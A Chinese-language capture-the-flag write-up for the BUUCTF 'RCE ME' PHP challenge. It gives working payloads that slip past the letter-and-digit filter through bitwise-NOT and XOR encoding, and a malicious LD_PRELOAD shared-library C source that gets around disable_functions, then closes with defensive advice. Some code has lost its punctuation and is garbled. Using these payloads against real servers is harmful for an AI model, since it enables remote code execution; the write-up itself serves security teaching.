1. 题目背景与初步分析BUUCTF的[极客大挑战 2019]RCE ME是一道典型的PHP代码审计与绕过题目。题目给出了一个简单的PHP页面核心代码如下?php error_reporting(0); if(isset($_GET[code])){ $code$_GET[code]; if(strlen($code)40){ die(太长了); } if(preg_match(/[A-Za-z0-9]/,$code)){ die(太简单了); } eval($code); } else{ highlight_file(__FILE__); } ?这段代码有几个关键限制输入的code参数长度不能超过40个字符不能包含任何字母和数字最终会通过eval执行我们的输入面对这样的限制常规的RCE方法基本都被堵死了。我们需要找到一种既不需要字母数字又足够简洁的payload构造方式。2. 绕过正则限制2.1 取反编码绕过原理PHP中有一个非常有趣的特性通过取反运算符(~)和URL编码可以构造出完全不包含字母数字的payload。具体原理是PHP允许使用~对字符串进行按位取反操作取反后的字符串可以通过urlencode编码最终得到的是一串百分号开头的编码完全符合题目要求举个例子要执行phpinfo()我们可以这样做php -r echo urlencode(~phpinfo); # 输出%8F%97%8F%96%91%99%90然后构造payload?code(~%8F%97%8F%96%91%99%90)();这个payload完全避开了字母数字检测长度也符合要求。2.2 其他绕过方法对比除了取反编码还有几种常见的绕过方式异或运算通过字符间的异或运算生成所需函数名自增技巧利用PHP的类型转换特性字符串拼接通过.运算符组合特殊字符但在本题中由于长度限制取反编码是最优解。我实测过其他方法要么长度超标要么构造过于复杂。3. 分析disable_functions限制成功执行phpinfo()后我们发现服务器配置了严格的disable_functionspcntl_alarm, pcntl_fork, ..., system, exec, shell_exec, popen, proc_open, passthru, ...基本上所有能直接执行系统命令的函数都被禁用了。这意味着即使我们拿到了webshell也无法直接执行系统命令。这种情况下我们需要寻找不依赖这些函数的RCE方法。经过分析发现以下几个突破口LD_PRELOAD环境变量劫持PHP FFI扩展如果启用ImageMagick漏洞如果安装其中LD_PRELOAD是最可靠的方案因为它不依赖任何PHP函数只需要能上传文件和执行PHP代码在Linux系统上普遍可用4. LD_PRELOAD利用详解4.1 原理剖析LD_PRELOAD是Linux系统的一个环境变量它可以指定在程序运行前优先加载的动态链接库。我们可以利用这个特性编写一个恶意.so文件定义一些关键函数的替代实现通过LD_PRELOAD让目标程序加载我们的.so当目标程序调用这些函数时实际执行的是我们的代码关键在于PHP的mail()函数会隐式调用外部程序sendmail这就给了我们注入的机会。4.2 实际操作步骤首先准备一个恶意的C代码// bypass_disablefunc.c #include stdlib.h #include stdio.h #include string.h void payload() { const char* cmd getenv(CMD); system(cmd); } int geteuid() { if (getenv(LD_PRELOAD) NULL) { return 0; } unsetenv(LD_PRELOAD); payload(); }编译为共享库gcc -shared -fPIC bypass_disablefunc.c -o bypass_disablefunc_x64.so上传.so文件到服务器本题中/var/tmp可写构造最终的payload?code${%fe%fe%fe%fe^%a1%b9%bb%aa}[_](${%fe%fe%fe%fe^%a1%b9%bb%aa}[__]);_assert__include(/var/tmp/shell.php)cmd/readflagoutpath/tmp/tmpfilesopath/var/tmp/bypass_disablefunc_x64.so这个payload做了以下几件事使用取反编码绕过初始限制包含一个特制的PHP脚本设置CMD环境变量为/readflag指定.so文件路径5. 完整利用链总结回顾整个利用过程可以分为四个关键阶段代码审计分析题目给出的PHP代码理解限制条件正则绕过使用取反编码技术构造无字母数字的payload环境侦察通过phpinfo()获取服务器配置信息权限突破利用LD_PRELOAD绕过disable_functions限制在实际渗透测试中这种层层递进的思路非常实用。每个环节都需要考虑多种可能性并选择最合适的绕过方法。6. 防御建议从防御角度可以采取以下措施避免直接使用eval执行用户输入使用白名单而非黑名单过滤特殊字符限制上传目录的执行权限定期更新PHP版本修复已知漏洞使用SELinux等强制访问控制机制这道题很好地展示了安全防护的深度防御原则 - 即使突破了第一道防线后面还应该有其他防护措施。